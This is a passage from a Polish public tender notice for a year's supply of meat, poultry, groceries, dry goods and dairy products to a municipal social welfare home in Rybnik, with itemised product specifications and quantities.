                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                nie
              <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 22/11/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zakup wraz z dostawą mięsa i wyrobów mięsnych dla Miejskiego Domu Pomocy  Społecznej w Rybniku.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp	Wyszczególnienie towaru	Jedn. miary	Ilość zamówienia w dostawie rocznej
			
			
1.	1	Baleron ( zawartość mięsa wieprzowego min 80% ). Zawartość w 100g min: białko 14g, węglowodany 0,6g, tłuszcz 10g	kg	30
2.	2	Boczek świeży b/k. Zawartość w 100g  min: białko 10,1g, węglowodany 0g, tłuszcz 53g	kg	60
3.	3	Boczek wędzony b/k . Zawartość w 100g min : białko 13,6 węglowodany 0,2 g, tłuszcz 22,5g	kg	250
4.	4	Frankfuterki wędzone w naturalnym jelicie . Zawartość mięsa wieprzowego min 85% -  mięso średnio rozdrobnione, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min :białko 10,8g, węglowodany 0,3g, tłuszcz 17,3g	kg	120
5.	6	Kaszanka-krupniok . Zawartość w 100g min: białko 18,7g, węglowodany 28,2g, tłuszcze 16,7g	kg	100
6.	7	Kiełbasa biała parzona. Zawartość mięsa wieprzowego min 75%  - mięso średnio rozdrobnione, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 12g, węglowodany 1,4g, tłuszcz 19,5g	kg	130
7.	8	Kiełbasa kminkowa . Zawartość mięsa wieprzowego min 80% -  mięso grubo mielone, bez udziału mięsa mechanicznie odkostnionego . Zawartość w 100g min : białko 25,1g, węglowodany 0g, tłuszcz 24,3g	kg	180
8.	10	Kiełbasa krakowska sucha . Zawartość mięsa wieprzowego min 95%  - mięso grubo mielone, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 23g, węglowodany 0g, tłuszcz 9g	kg	80
9.	29	Kiełbasa śląska (zawartość mięsa wieprzowego min 80% - mięso grubo mielone, nieodkostnmione mechanicznie MOM. Zawartość w 100g min: białko 13,3g, węglowodany 2,2g, tłuszcz 19,2g	kg	500
10.	30	Kiełbasa śląska drobiowa (zawartość mięsa drobiowego  min 80% - mięso grubo mielone, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 17,3g, węglowodany 0g, tłuszcz 14,4g	kg	600
11.	11	Kiełbasa tostowa . Zawartość mięsa wieprzowego min 70% - mięso średnio mielone, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 19,6g, węglowodany 0g, tłuszcz 18,9g	kg	140
12.	9	Kiełbasa wieprzowa szynkowa . Zawartość mięsa wieprzowego min 85%  -  mięso średnio rozdrobnione, bez udziału mięsa mechanicznie rozdrobnionego. Zawartość w 100g min : białko 10,2g, węglowodany 0g, tłuszcz 29,3g	kg	150
13.	12	Kiełbasa żywiecka . Zawartość mięsa wieprzowego min 95%  - mięso grubo mielone, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 17,9g, węglowodany 0g, tłuszcz 10g	kg	180
14.	5	Kości wędzone	kg	60
15.	15	Metka łososiowa . Zawartość mięsa wieprzowego min 50% , min 10% mięsa wołowego i 40% tłuszczu wieprzowego  - bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 10g, węglowodany 5g, tłuszcz 45,5g	kg	110
16.	13	Mielonka drobiowa . Zawartość mięsa drobiowego min 80%  - mięso średnio rozdrobnione, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 12,2g, węglowodany 3,3g, tłuszcz 20,5g	kg	150
17.	14	Mielonka turystyczna . Zawartość mięsa wieprzowego min 80% - mięso średnio rozdrobnione, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 12,6g, węglowodany 2,5g, tłuszcz 7,3g	kg	260
18.	16	Mortadela . Zawartość mięsa wieprzowego min 70%, tłuszcz wieprzowy 30% - bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 12g, węglowodany 1g, tłuszcz 22g	kg	220
19.	18.	Parówki śląskie-cienkie w folii                                             Zawartość mięsa wieprzowego min 75%  -  bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min:  białko 11g, węglowodany 1,1, tłuszcze 28,9g	kg	250
20.	17	Parówkowa . Zawartość mięsa wieprzowego min 75%  - bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 10,2g, węglowodany 0g, tłuszcze 29,3g	kg	550
21.	19	Pasztet drobiowy  w naturalnym jelicie - zawartość składników drobiowych min 51%. Zawartość w 100g min: białko 10,8g, węglowodany 3,8g, tłuszcz 21,6g	kg	70
22.	20	Pasztetowa   w naturalnym jelicie- zawartość składników wieprzowych min 51%. Zawartość w 100g min :białko 11,3g, węglowodany 3,9g, tłuszcz 32,1g	kg	50
23.	21	Polędwica drobiowa   -  zawartość mięsa drobiowego min 75%. Zawartość w 100g min: białko 15,2g, węglow. 1,3g, tłuszcz 1,3g	kg	180
24.	22	Polędwica sopocka - zawartość mięsa wieprzowego min 80%. Zawartość w 100g min: białko 18,2g, węglowodany 0,5g, tłuszcz 2,7g	kg	150
25.	24	Salceson ozorkowy. Zawartość podrobów wieprzowych min 51%,  grubo mielone, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 14g, węglowodany 1g, tłuszcze 37g	kg	55
26.	23	Salceson z indyka - zawartość mięsa z indyka min. 55% 
mięso grubo mielone, bez udziału mięsa mechanicznie odkostnionego. Zawartość w 100g min: białko 11,3g, węglowodany 0,5g, tłuszcz 28,8g	kg	70
27.	25	Szynka cygańska (zawartość mięsa wieprzowego min 80% ). Zawartość w 100g min: białko16,7g, węglowodany 0g, tłuszcz 19,8g	kg	150
28.	28	Szynka dębicka (zawartość mięsa wieprzowego min 82% ). Zawartość w 100g min: białko17,5g, węglowodany 0g, tłuszcz 5,4g	kg	130
29.	27	Szynka prasowana (zawartość mięsa wieprzowego min 82% ). Zawartość w 100g min: białko16,7g, węglowodany 0g, tłuszcz 19,8g	kg	120
30.	26	Szynka tradycyjna wędzona  (zawartość mięsa wieprzowego min 85%). Zawartość w 100g min : białko16,7g, węglowodany 0g, tłuszcz 19,8g	kg	150
31.	36	Wieprzowa łopatka b/k	kg	480
32.	37	Wieprzowa słonina	kg	100
33.	39	Wieprzowa szynka b/k	kg	100
34.	40	Wieprzowa wątroba	kg	10
35.	34	Wieprzowe golonka	kg	160
36.	33	Wieprzowe gulaszowe	kg	480
37.	32	Wieprzowe żeberka mięsne	kg	180
38.	35	Wieprzowy karczek b/k	kg	300
39.	38	Wieprzowy schab b/k	kg	300
40.	31	Wołowe rosołowe	kg	65
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15100000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Terim dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b> Zakup wraz z dostawą drobiu dla Miejskiego Domu Pomocy Społecznej w Rybniku.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp	Wyszczególnienie towaru	Jedn. miary	Ilość zamówienia w dostawie rocznej
			
			
			
1	Ćwiartki tylne z kurczaka	kg	1600
2	Filet z indyka	kg	260
3	Filet z kurczaka	kg	620
4	Kurczak świeży	kg	850
5	Porcje rosołowe z kurczaka	kg	500
6	Skrzydła z indyka	kg	850
7	Wątroba z indyka	kg	210
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15100000-9<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zakup wraz z dostawą różnych produktów spożywczych dla Miejskiego Domu Pomoc Społecznej w Rybniku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp	Wyszczególnienie towaru	Jedn. miary	Ilość zamówienia
w dostawie rocznej
1.		Aromat do ciasta migdałowy 10ml	szt	5
2.		Biszkopty 120g  . Skład: mąka pszenna, jaja, cukier inwertowany, skrobia ziemniaczana, emulgatory. Zawartość w 100g produktu min: białko 10,9g, węglowodany 71,1g, tłuszcz 4,6g	szt	550
3.		Biszkopty z owocową galaretką oblane czekoladą 147g  . Skład: min. galaretki 53%w tym koncentrat owocowy 1,5 % co najmniej 15% czekolada. Zawartość w 100gproduktu  min: białko 3,9g, węglowodany 71g, tłuszcz 7,3g	szt	150
4.		Brzoskwinia w puszcze 850ml- połowki brzoskwiń w lekkim syropie
Skład: brzoskwinia , woda , cukier .Zawartośc w 100g: biłako 0,3g, weglowadany 16,9g, tłuszcz 0,1g	szt	180
5.		Budyń b/c 40g  różne smaki . Skład: mąka ziemniaczana, mąka pszenna. Zawartość w 40g produktu min :białko 1,36g, weglowodany3,8g, tłuszcz 0,8g	szt	500
6.		Budyń z cukrem 60g różne smaki . Skład: mąka ziemniaczana, mąka pszenna, cukier. Zawartość w 100gproduktu min: białko 1,8g, węglowodany 8,46g, tłuszcze 1,08g	szt	1000
7.		Chrzan pasteryzowany na bazie kwasku cytrynowego - słoik 190g	szt	200
8.		Ciastka maślane bez dodatku cukru 125g . Skład: mąka pszenna, tłuszcz roślinny utwardzony, skrobia ziemniaczana, substancje słodzące, masło (min.5 %) żółtko, jajko w proszku, sól, substancje spulchniające, aromat, barwniki	szt	400
9.		Cukier wanilinowy 32g	szt	250
10.		Cynamon 15g	szt	60
11.		Czekolada bez cukru 100g . Skład: substancje słodzące, mleko w proszku pełne, tłuszcz i miazga kakaowa, emulgatory, aromaty, masa kakaowa min.36%	szt	450
12.		Czekolada pełno mleczna twarda 90g . Skład: cukier, mleko pełne w proszku, miazga kakaowa, tłuszcz roślinny, serwatka, masa kakaowa w czekoladzie min. 25%	szt	900
13.		Czosnek mielony 20g	szt	10
14.		Deser dla dzieci 125g, bez dodatku cukru, bezglutenowy,  z witaminą C. Zawartość w 100g produktu min: białko 0,40g, węglowodany 15,2g, tłuszcze 0,2g	szt	550
15.		Dżem b/c -słodzony fruktozą (minimum 45g owoców /100g dżemu) słoiki 240g- różne smaki zawartość w 100g produktu min : białko 0,3g, węglowodany 30g, tłuszcz 0,2g	szt	900
16.		Dżem niskosłodzony różne smaki 280g (co najmniej na 40g owoców/100g dżemu, 35g cukru/100g produktu) ,. Zawartość w 100g produktu min: białko 0,1g, węglowodany 35,2g, tłuszcz 0,10g	szt	450
17.		Fasolka szparagowa konserwowa 720ml	szt	100
18.		Galaretka owocowa w proszku 75g różne smaki	szt	800
19.		Gorczyca 25g	szt	8
20.		Groszek konserwowy  400g	szt	300
21.		Herbata czarna ekspresowa. (skład: mieszanka czarnych herbat), okrągłe torebki 100szt w opakowaniu	op	650
22.		Herbata owocowa ekspresowa o smaku malinowym , 20 torebek  w opakowaniu (skład: owoc  malinowy min.0,5%, kwiat hibiskusa, jabłko, owoc dzikiej róży, aromaty owocu bzu czarnego)	op	80
23.		Kakao ciemne 150g . Skład : kakao odtłuszczone 100%	szt	55
24.		Kawa naturalna 400g  -  100% ziaren kawy arabiki	szt	210
25.		Kawa rozpuszczalna naturalna słoik 100g ( 100% kawa  naturalna arabika )	szt	36
26.		Kawa zbożowa 250g .  Skład: żyto, jęczmień, cykoria, burak cukrowy -  prażony	szt	100
27.		Kawa zbożowa rozpuszczalna 150g  . Skład: zboża min.72%  (jęczmień, żyto, cykoria, burak cukrowy prażony)	szt	100
28.		Ketchup łagodny 480g. Skład: pomidory (198g na 100g ketchupu) , cukier, ocet, sól, skrobia modyfikowana, aromat naturalny, bez konserwantów	szt	110
29.		Kisiel b/c 38g	szt	400
30.		Kisiel z cukrem 77g	szt	800
31.		Kompot agrestowy 0,9l	szt	24
32.		Koncentrat barszczu z buraków ćwikłowych  330ml(Skład: woda, zagęszczony sok z buraków ćwikłowych min 14%, cukier, sól, ocet spirytusowy, kwas cytrynowy, regulator kwasowości, przeciwutleniacz kwas askorbinowy, przyprawy aromatyczne)	szt	200
33.		Koncentrat pomidorowy 900g  (min 30% z świeżych pomidorów, bez dodatków) 	szt	220
34.		Kruchy wafelek z kremem kakaowym 17,5g - oblany czekoladą  min.49,7% ,(min.30,7% czekolada, zawartość masy kakaowej min  43%)	szt	280
35.		Kruchy wafelek z kremem kakaowym 50g - oblany czekoladą  min.49,7% ,(min.30,7% czekolada, zawartość masy kakaowej min  43%)	szt	1188
36.		Kukurydza konserwowa 390- 400g	szt	24
37.		Kwasek cytrynowy 50g 	szt	150
38.		Liść laurowy 7g	szt	26
39.		Majeranek 10g	szt	260
40.		Majonez  słoik 835ml . Skład : olej roślinny min 80%, woda, musztarda, gorczyca cukier, sól, jajko kurze 4,3%, stabilizatory guma guar, guma ksantenowa	szt	144
41.		Mak- luz 	kg	9
42.		Mieszanka cukierków czekoladowych - różne smaki. Skład: czekolada (miazga czekoladowa min18,50%, cukier, tłuszcz roślinny, emulgator sojowy	kg

	60
43.		Migdały płatki - luz	kg	7
44.		Miód wielokwiatowy naturalny pochodzący z krajów członkowskich UE  słoik 1kg	szt	54
45.		Morele suszone- luz	kg	7
46.		Musztarda stołowa 200g . Skład :  gorczyca, ocet, woda, sól, cukier, kwasek cytrynowy, przyprawy naturalne, kurkuma	szt	600
47.		Ocet spirytusowy min. 10% 0,5l	szt	110
48.		Ogórki konserwowe  860g. skład: ogórek, ocet spirytusowy 10%, cukier, gorczyca , sól, przyprawy naturalne	szt	70
49.		Olej rzepakowy rafinowany z pierwszego tłoczenia filtrowany na zimno 1l	szt	600
50.		Olej rzepakowy rafinowany z pierwszego tłoczenia filtrowany na zimno 0,5l	szt.	60
51.		Orzechy włoskie łuskane -luz	kg	7
52.		Owoce suszone  (jabłka ) - luz 	kg	10
53.		Papryka konserwowa 900g . skład: papryka czerwona, cukier, ocet spirytusowy 10%, sól, gorczyca	szt	100
54.		Papryka mielona słodka 15g	szt	200
55.		Pasztet drobiowy 50g. Skład: mięso z kurcząt min 38,4% tłuszcz roślinny, wątroba z kurcząt, sól, mleko w proszku, białko sojowe, kasza manna, przyprawy, bez konserwantów i glutiaminu sodu	szt	950
56.		Pasztet drobiowy 90g. Skład: surowce drobiowe co najmniej 34%,woda, tłuszcz wieprzowy 13%, mąka pszenna, białko sojowe, sól, przyprawy, regulator kwasowości, emulgatory	szt	1400
57.		Pieczarki marynowane 760ml . skład: pieczarka, ocet spirytusowy, sól, 	szt	32
58.		Pieprz mielony czarny 20g	szt	420
59.		Pierniczki nadziewane w czekoladzie 150g  (nadzienie co najmniej 29%, czekolada min.17%)	szt	150
60.		Podgrzybek suszony 40g, kraj pochodzenia Polska	szt	15
61.		Powidła śliwkowe węgierkowe 300g  (min160g owoców /100g wyrobu , cukier 54g/100g)	szt	650
62.		Proszek do pieczenia 36g	szt	180
63.		Przecier ogórkowy - słoik 290g . Skład: ogórek kwaszony 100%, sól przyprawy naturalne	szt	200
64.		Przyprawa 1kg . Skład: warzywa suszone min.15,1%, sól, substancje wzmacniające smak	szt	52
65.		Przyprawa do bigosu 20g
Skład: czosnek, kminek, kolendra, liść laurowy, majeranek, owoc jałowca	szt	15
66.		Przyprawa do flaków 20g . Skład: warzywa suszone: marchew, pasternak, czosnek, przyprawy: papryka słodka, ostra, imbir, gałka muszkatołowa, pieprz, liść laurowy ziele angielskie, substancje wzmacniające smak i zapach	szt	25
67.		Przyprawa do kurczaka 25g . Skład: czosnek, chili, papryka słodka, majeranek, liści laurowy, seler, tymianek, pietruszka liść, sól, cebula, mąka 	szt	110
68.		Przyprawa w płynie 1litr . Skład: woda, sól, substancje  wzmacniające smak i zapach, glutaminian monosodowy,  regulator kwasowości, kwas cytrynowy, barwniki, aromaty	szt	200
69.		Rodzynki sułtańskie -luz	kg	10
70.		Śliwka suszona kalifornijska - luz	kg	20
71.		Śliwka w syropie 900g	szt	45
72.		Słodzik niskokaloryczny w pudrze nie zawierający sacharyny, na bazie aspartanu, substancja słodzona maltodekstryna -  słoiki 150g . Zawartość w 100g produktu min: białko 2%, węglowodany 98%, tłuszcz 0%	szt	20
73.		Sok owocowo- warzywny przecierowy 300ml . Skład: przecier warzywny i soki min 55%,woda cukier, kwasek cytrynowy, wzbogacony witaminą C	szt	1300
74.		Sok wieloowocowy 1L, o obniżonej wartości energetycznej light wyprodukowany z zagęszczonego soku owocowego pasteryzowanego min 40%, bez środków konserwujących, bez dodatku cukru  . Zawartość w 100ml soku min: białko 0,40g, węglowodany 10g, tłuszcz 0,3g	szt	40
75.		Sos do pieczeni ciemny 30g . Skład: co najmniej 2,7% warzywa suszone, skrobia ziemniaczana i modyfikowana, mąka pszenna, aromaty, tłuszcze roślin utwardzonych, przyprawy, koncentrat pomidorowy  suszony, mąka ryżowa	szt	250
76.		Sos do spagetti 40g (min.40% suszonych pomidorów, co najmniej 9% koncentratu pomidorowego)	szt	180
77.		Sos grzybowy 30g . Skład:  warzywa suszone, min 1,3% i  co najmniej 6,4 % grzyby suszone	szt	10
78.		Sos sałatkowy 0,9g   różne smak	szt	550
79.		Suchary b/c 285g . Skład: mąka pszenna, tłuszcz roślinny utwardzony, serwatka w proszku, emulgator  lecytyna sojowa, mąka sojowa, przeciw utleniacz kwas askorbinowy 
Zawartość w 100g produktu min:  białko 1,3g, węglowodany7,5g, tłuszcze 0,7g	szt	450
80.		Syrop wysoko słodzony 430ml. Skład: syrop glukozowo-fruktozowy, cukier, woda, zagęszczony sok malinowy min 0,32%, koncentraty: czarna porzeczka, marchew, regulator kwasowości: kwas cytrynowy, barwnik karmel, aromat) . Zawartość w 100ml syropu min: białko 0,1g, węglowodany 84g, tłu81szcz 0,1g	szt 	120
81.		Szarlotka z brzoskwinią  jabłka prażone słoik 780g . Skład : min jabłko 70%, brzoskwinia min 15%, cukier, skrobia modyfikowana, substancja zagęszczająca, kwas cytrynowy, kwas askorbinowy, aromat	szt	45
82.		Wafle - różne smaki 80g . Skład: mąka pszenna, tłuszcz roślinny utwardzony, cukier, serwatka w proszku, mleko w proszku, skrobia, olej roślinny, sól, aromat smakowy, emulgatory, substancje spulchniające	szt	1200
83.		Wafle bez dodatku cukru słodzone fruktozą 110g.  Skład: mąka pszenna, tłuszcz roślinny utwardzony, mleko w proszku odtłuszczone, serwatka w proszku substancje słodzące maltitol, chrupki kukurydziane, 82skrobia ziemniaczana, lecytyna sojowa, sól, aromaty. Zawartość w 10830g produktu min: białko 9,7g, węglowodany 48g, tłuszcze 28g	szt	850
84.		Woda mineralna lekko gazowana 1,5l	szt	950
85.		Woda mineralna niegazowana 1,5l	szt	100
86.		Zaprawa cytrynowa 1L . Skład: sok cytrynowy min. 40% z soku zagęszczonego kwasku cytrynowego, aromat naturalny, woda	szt	80
87.		Żelatyna  50g	szt.	80
88.		Zioła prowansalskie 10g. Skład: oregano,  cząber rozmaryn, bazylia, majeranek, tymianek	szt.	20
89.		Ziele angielskie 15g	szt.	30
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zakup wraz z dostawą artykułów sypkich dla Miejskiego Domu Pomocy Społecznej w  Rybniku.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp.	Wyszczególnienie towaru	Jedn.
miary	Ilość zamówienia
w dostawie rocznej
1.		Cukier 1000g	kg	2200
2.		Cukier puder 400g	szt.	12
3.		Kasza gryczana 1000g	kg	80
4.		Kasza Kus-kus 250-500g	kg	100
5.		Kasza manna 1000g	kg	550
6.		Kasza mazurska 1000g	kg	200
7.		Kaszka mleczno- ryżowa różne smaki 230g skład: kaszka ryżowa 38%, mleko modyfikowane 33%, mleko odtłuszczone, odmineralizowana serwatka  w proszku, tłuszcz roślinny) 	szt.	450
8.		Mąka na żurek 1000g	kg	12
9.		Mąka pszenna  typ 500 wrocławska 1000g	kg	750
10.		Mąka ziemniaczana 1000g	kg	90
11.		Makaron - muszla 500g . Skład: mąka durum (semolina), woda  . Zawartość w 100g makaronu min: białko 10,2g, węglowodany 72,8g, tłuszcz 1,3g	kg	210
12.		Makaron - świdry  500g . Skład: mąka durum (semolina), woda źródlana, witamina A . Zawartość w 100g makaronu min: białko 10,2g, węglowodany 72,8g, tłuszcz 1,3g	kg	210
13.		Makaron 500g  - łazanki . Skład: mąka durum (semolina), woda źródlana, witamina A. Zawartość w 100g makaronu min: białko 10,2g, węglowodany 72,8g, tłuszcz 1,3g	kg	64
14.		Makaron -nitka 500g. Skład: mąka durum (semolina),woda. Zawartość w 100g makaronu min: białko 10,2g, węglowodany 72,8g, tłuszcz 1,3g	kg	180
15.		Płatki kukurydziane 500g . Skład : min grys kukurydziany 87%, cukier, ekstrakt słodowy, sól	szt.	150
16.		Płatki owsiane 500g	szt.	200
17.		Płatki ryżowe błyskawiczne 200-500g . Zawartość w 100g produktu min: białko 6,7g, węglowodany 76,5g, tłuszcz 0,7g	kg	210
18.		Ryż 1000g	kg	430
19.		Sól jodowana 1000g	kg	380
20.		Zacierka makaronowa 250g . Skład: mąka pszenna makaronowa, 2 jajka/1kg mąki, woda. Kurkuma. Zawartość w 100g produktu min : białko 11,7g, węglowodany 81,1g, tłuszcz 1,4g	szt.	700
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15600000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Termin dostawy</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Zakup wraz z dostawą produktów mleczarskich dla Miejskiego Domu Pomocy    Społecznej w Rybniku<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Lp	Wyszczególnienie towaru	Jedn. miary	Ilość zamówienia      w dostawie rocznej
			
			
			
1.		Deser mleczny z czekoladą i orzechami 100g. Skład: min 49% mleko, śmietanka, cukier, skrobia modyfikowana kukurydziana, zagęstniki, karogen, mączka chleba świętojańskiego, odtłuszczone kakao min 0,8%, orzechy laskowe min 0,5%, czekolada w proszku min 0,5%, cytrynian wapnia, aromat.	szt.	250
2.		Deser z bitą śmietaną zawartość tłuszczu min. 6%   -  175g . Skład: mleko pasteryzowane, śmietana pasteryzowana min.27%, emulgator,  kakao niskosłodzone, zagęstniki,  syrop glukozowy 	szt.	550
3.		Drożdże piekarskie 100g	szt.	 10
4.		Jogurt naturalny b/c 175g ,  2% tłuszczu . Zawartość w 100g produktu min: białko 4g, węglowodany 5,3g, tłuszcz 0,05g	szt.	1000
5.		Jogurt owocowy 150g . Skład : min 2% sok owocowy, mleko, śmietana, żelatyna, żywe kultury bakterii. Zawartość w 100g produktu min: białko 3,5g, węglowodany 14,6g tłuszcz 2,5g	szt.	2000
6.		Kefir 400ml  o zawartości tłuszczu  2%. Zawartość w 100g min:  białko 3,9g, węglowodany 5,0g, tłuszcz 0,05g	szt.	450
7.		Kluski na parze bez nadzienia opakowanie 8szt- 400g 
Skład: mąka pszenna 90%, drożdże	op.	165
8.		Kluski na parze z nadzieniem opakowanie 6szt- 370g 
Skład: mąka pszenna 90%, drożdże, nadzienie: jagodowe, malinowe, czekoladowe	op.	220
9.		Maślanka naturalna karton 1 litr o zawartości tłuszczu 1,5%. Zawartość w 100ml min: białko 3,4g, węglowodany 4,5g, tłuszcz 1,5g	szt.	750
10.		Masło zawartość tłuszczu min 82%,
masa netto 200g  Zawartość w 100g produktu min: białko 0,2g, węglowodany 0,4g, tłuszcz 76g	szt.	12600
11.		Mleko folia 2%  0,9l . Zawartość w 100ml min: białko 3,4, węglowodany 4,9g, tłuszcz 2g	szt.	17250
12.		Ser domowy z kminkiem płaty 2kg . skład: twaróg kwasowy, woda, laktoaza, białko mleka, regulator kwasowosci, sól, kminek 0,3% zawartość  w 100g: białko 19g, weglowodany 4g,tłuszcz 1g	kg	168
13.		Ser topiony kremowy,  krążki 200g  różne smaki 
Skład: min .zawartość tłuszczu 29%, woda, masło, ser, odtłuszczone mleko w proszku, sole emulgujące, regulator kwasowości . Zawartość w 100g sera min : białko 11g, węglowodany 8g, tłuszcze 11g	op	1850
